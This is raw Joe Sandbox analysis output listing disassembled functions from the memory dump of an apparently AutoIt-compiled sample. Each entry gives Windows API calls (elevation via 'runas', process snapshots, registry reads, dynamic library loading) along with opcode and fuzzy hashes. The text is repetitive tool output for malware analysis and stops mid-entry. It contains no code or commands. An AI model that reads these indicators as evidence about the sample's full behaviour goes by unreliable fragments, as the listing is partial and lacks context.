                                                                                                                                                                      • Instruction Fuzzy Hash: C8119910F0C10BB6FA68B7F0851A2BD8191DF91F04FC40474E60E9A1C3FF1DA899A632
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF73D0633E4: MapVirtualKeyW.USER32(?,?,?,00007FF73D044EC6), ref: 00007FF73D063416
                                                                                                                                                                        • Part of subcall function 00007FF73D0633E4: MapVirtualKeyW.USER32(?,?,?,00007FF73D044EC6), ref: 00007FF73D063424
                                                                                                                                                                        • Part of subcall function 00007FF73D0633E4: MapVirtualKeyW.USER32(?,?,?,00007FF73D044EC6), ref: 00007FF73D063434
                                                                                                                                                                        • Part of subcall function 00007FF73D0633E4: MapVirtualKeyW.USER32(?,?,?,00007FF73D044EC6), ref: 00007FF73D063444
                                                                                                                                                                        • Part of subcall function 00007FF73D0633E4: MapVirtualKeyW.USER32(?,?,?,00007FF73D044EC6), ref: 00007FF73D063452
                                                                                                                                                                        • Part of subcall function 00007FF73D0633E4: MapVirtualKeyW.USER32(?,?,?,00007FF73D044EC6), ref: 00007FF73D063460
                                                                                                                                                                        • Part of subcall function 00007FF73D0455A8: RegisterWindowMessageW.USER32(?,?,?,00007FF73D045050), ref: 00007FF73D045612
                                                                                                                                                                      • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73D04106D), ref: 00007FF73D045130
                                                                                                                                                                      • OleInitializeWOW.OLE32 ref: 00007FF73D0451B6
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73D04106D), ref: 00007FF73D08B2CA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                      • String ID: AutoIt
                                                                                                                                                                      • API String ID: 1986988660-2515660138
                                                                                                                                                                      • Opcode ID: 01eaa3fa0f2dfdac1478d518468f6ef265075edaf64ce2446a91aa85ffc68ec8
                                                                                                                                                                      • Instruction ID: 8ad29ba20160fb39ea799ee2ba1e75f1b8296986787058154e49329363a65bdd
                                                                                                                                                                      • Opcode Fuzzy Hash: 01eaa3fa0f2dfdac1478d518468f6ef265075edaf64ce2446a91aa85ffc68ec8
                                                                                                                                                                      • Instruction Fuzzy Hash: A4C1FB71D0CB4BA6E740EB95B8800B4F7A8FF94780BD60236D44D42660FFBE6199E760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetOpenFileNameW.COMDLG32 ref: 00007FF73D0A0F48
                                                                                                                                                                        • Part of subcall function 00007FF73D05D3F4: GetFullPathNameW.KERNEL32(?,00007FF73D05D3E1,?,00007FF73D044D38,?,?,?,00007FF73D04109E), ref: 00007FF73D05D41F
                                                                                                                                                                        • Part of subcall function 00007FF73D05D4C0: GetLongPathNameW.KERNELBASE ref: 00007FF73D05D4E4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                      • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                                                                                                      • API String ID: 779396738-2360590182
                                                                                                                                                                      • Opcode ID: 88249c6a1ccf26aa5524af22e8d5c0eadc741d17132a6cdbcffa4f30457a9448
                                                                                                                                                                      • Instruction ID: 1c6f8843afb53f3c8aad031b4718b5bdbf122a9b40698393fe5c22449e1aee1c
                                                                                                                                                                      • Opcode Fuzzy Hash: 88249c6a1ccf26aa5524af22e8d5c0eadc741d17132a6cdbcffa4f30457a9448
                                                                                                                                                                      • Instruction Fuzzy Hash: A7318F7260CB8A99E710EFA1E8401ADB7A5FB49B84F984135DE8C43B55EF3CD544D720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow
                                                                                                                                                                      • String ID: runas
                                                                                                                                                                      • API String ID: 3686610399-4000483414
                                                                                                                                                                      • Opcode ID: 3be8f00ca0e46369e39409468333b1e4ccc4b2cbc8b2745a680b7241c59db7ac
                                                                                                                                                                      • Instruction ID: f05272ccd02975df81afa1bcba417577540817559c699745442e273f03055972
                                                                                                                                                                      • Opcode Fuzzy Hash: 3be8f00ca0e46369e39409468333b1e4ccc4b2cbc8b2745a680b7241c59db7ac
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D316D61E1C54BB2EA50FBA0F8445F9E361BF80B40FC00031E54E065A6BF6CE649EB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNELBASE(?,?,00007FF73D05C715,?,?,?,00007FF73D047563,?,?,?,?,?,?,?,00007FF73D047ED8), ref: 00007FF73D0480A4
                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,00007FF73D05C715,?,?,?,00007FF73D047563,?,?,?,?,?,?,?,00007FF73D047ED8), ref: 00007FF73D08C83E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                      • Opcode ID: fca5e87318ff2841342a100c57f7c6fbaa1f4b5127350fe43723f16529682594
                                                                                                                                                                      • Instruction ID: 4ea71b7896e9c69ee9df53f3cdf947f03b3fc56e9cf5e9ac9b01e02211e65356
                                                                                                                                                                      • Opcode Fuzzy Hash: fca5e87318ff2841342a100c57f7c6fbaa1f4b5127350fe43723f16529682594
                                                                                                                                                                      • Instruction Fuzzy Hash: E9B1D772A0CA5A96E721EB95E058639E3B0FF44F90F914531DA9E03790FF3DE041A760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 692674288-0
                                                                                                                                                                      • Opcode ID: 3aa217faec2488a085a5d2137956a00219dfdb0ba79b00fb47df8247b19ce7fb
                                                                                                                                                                      • Instruction ID: 743feec0ee44cb0c38d5e9e342af21af4016abcd6f4636976c0735e293157f88
                                                                                                                                                                      • Opcode Fuzzy Hash: 3aa217faec2488a085a5d2137956a00219dfdb0ba79b00fb47df8247b19ce7fb
                                                                                                                                                                      • Instruction Fuzzy Hash: 65418122A1CA96A1E710FBA1D4845AEE364FB94F84FD44032EE4E07755EF7CE505DB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3812282468-0
                                                                                                                                                                      • Opcode ID: f32f8546605101e790793f6cd567c25f9fc03ce5bbceb99a94b21c56dbf42347
                                                                                                                                                                      • Instruction ID: 3062b31c3a7122de558aba60f7ac3fa0308ef347297bd2742bfcba5a107789de
                                                                                                                                                                      • Opcode Fuzzy Hash: f32f8546605101e790793f6cd567c25f9fc03ce5bbceb99a94b21c56dbf42347
                                                                                                                                                                      • Instruction Fuzzy Hash: EE310762A0C795A6EB21AB51E0402BDBB68EB44FC4F984031CE8D07745EF2CD644C760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE(?,?,00000000,00007FF73D05CC6D), ref: 00007FF73D05CDCF
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE(?,?,00000000,00007FF73D05CC6D), ref: 00007FF73D05CDE7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 34200e826e90f7bcf0032023a095b952565998b9d268f4cf0b1607b690fe84c7
                                                                                                                                                                      • Instruction ID: 8c5b1e405cf44e7edaed3d996f4c22a82d1e22a6e0e8a12e0c507e360f9c433d
                                                                                                                                                                      • Opcode Fuzzy Hash: 34200e826e90f7bcf0032023a095b952565998b9d268f4cf0b1607b690fe84c7
                                                                                                                                                                      • Instruction Fuzzy Hash: D121F172A1DB8592EB50DB96E1402ACA761FB44FC4F904036EB0E43B44DF3CE4A5D760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF73D04435E,?,?,?,?,?,?,00007FF73D044C14), ref: 00007FF73D0443B1
                                                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF73D04435E,?,?,?,?,?,?,00007FF73D044C14), ref: 00007FF73D0443DF
                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF73D04435E,?,?,?,?,?,?,00007FF73D044C14), ref: 00007FF73D044406
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3677997916-0
                                                                                                                                                                      • Opcode ID: 7e06e7158ad2b06198f10be932ad8853ebd3a9e99d2ee993ed22abc941eadc66
                                                                                                                                                                      • Instruction ID: b5d29b3abc9846d31fc077f602cedeacc4b225bf616da6f19b6f9ba546267f7e
                                                                                                                                                                      • Opcode Fuzzy Hash: 7e06e7158ad2b06198f10be932ad8853ebd3a9e99d2ee993ed22abc941eadc66
                                                                                                                                                                      • Instruction Fuzzy Hash: 47218832A1CB6597D7109FA5E4489AEB3B4FB88F84B941131EB8D83B14EF79E414DB04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                      • Opcode ID: b697fe1b03dcef3d4df6d21255900bdc26538878508daf476c5c2854f5282b69
                                                                                                                                                                      • Instruction ID: d659a0bac31229b0490d0cf31d81bb969b012a913968ed955f2b10b17c468ae7
                                                                                                                                                                      • Opcode Fuzzy Hash: b697fe1b03dcef3d4df6d21255900bdc26538878508daf476c5c2854f5282b69
                                                                                                                                                                      • Instruction Fuzzy Hash: EDE04F64B0C34992EF44BBE1A8C53BDA356EF88F41F90503CD94E07792EF3DA408A220
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                      • String ID: CALL
                                                                                                                                                                      • API String ID: 1385522511-4196123274
                                                                                                                                                                      • Opcode ID: 3935989ee1c67edd5b89fefeeab71b320e849a8a5001b04341adde9d280662a0
                                                                                                                                                                      • Instruction ID: 7c5e752fd97c4f9278b7841a33bb4cc9b7c7d6da80045408b6b83b171fafc8cd
                                                                                                                                                                      • Opcode Fuzzy Hash: 3935989ee1c67edd5b89fefeeab71b320e849a8a5001b04341adde9d280662a0
                                                                                                                                                                      • Instruction Fuzzy Hash: B7227E72B0C64AAAEB10EBA5D0442ACB7A2FB44F88F904135CE4D57799EF38E455D720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1385522511-0
                                                                                                                                                                      • Opcode ID: 054052d1de29e5c70d6877a80ec71d8cbbdd98924133b8d9a8ce9a7c403be64d
                                                                                                                                                                      • Instruction ID: 5819710de6747afbc51ba690278fcd6027957973f18f32fcabbc983204f53e0e
                                                                                                                                                                      • Opcode Fuzzy Hash: 054052d1de29e5c70d6877a80ec71d8cbbdd98924133b8d9a8ce9a7c403be64d
                                                                                                                                                                      • Instruction Fuzzy Hash: DC62B332A0C65AA2EB60AB95E4487B9E371FB84F84F854035DE5D437A4EF3DE441E720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 7da5e06ec66ada504e84ef804a6f83dd1262074be41b4d9573f9fb513581d3c7
                                                                                                                                                                      • Instruction ID: 3743619a33c667564e8b896eba8faca593c4d6daf7fdf0972e1abbbbf4580677
                                                                                                                                                                      • Opcode Fuzzy Hash: 7da5e06ec66ada504e84ef804a6f83dd1262074be41b4d9573f9fb513581d3c7
                                                                                                                                                                      • Instruction Fuzzy Hash: BE612C11B0D68A62FA24B9F598043B9E2D0AF44FA4F844634DD6C4B7C5FF3CE401A660
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                      • Opcode ID: cdd4ff1307c57f1a9388ddac5ab71e9a7c0c3079cce15680bd6c139683ff9e26
                                                                                                                                                                      • Instruction ID: 68d8490ce90eae08eccb754743ffcbe58db1269a435ae5415ed4b98af540c920
                                                                                                                                                                      • Opcode Fuzzy Hash: cdd4ff1307c57f1a9388ddac5ab71e9a7c0c3079cce15680bd6c139683ff9e26
                                                                                                                                                                      • Instruction Fuzzy Hash: F241D5B290C60A92F720AF55E404339B7A1FB85FA4F844230EA6D076C9EF7DD448E765
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2632591731-0
                                                                                                                                                                      • Opcode ID: 659940d7e3e3ccfc44864b2c683c220b024f41b80ad7bb24266295cf266947ba
                                                                                                                                                                      • Instruction ID: 9128e4007ba2796cdd3bac9804e9ef54f68a730be89245fb7fde28d5af8ec9c4
                                                                                                                                                                      • Opcode Fuzzy Hash: 659940d7e3e3ccfc44864b2c683c220b024f41b80ad7bb24266295cf266947ba
                                                                                                                                                                      • Instruction Fuzzy Hash: 44416272B1C61AA6EB10EBA5D4513FCA3A1EB44F88F844131EE0E47695EF3CD409D364
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
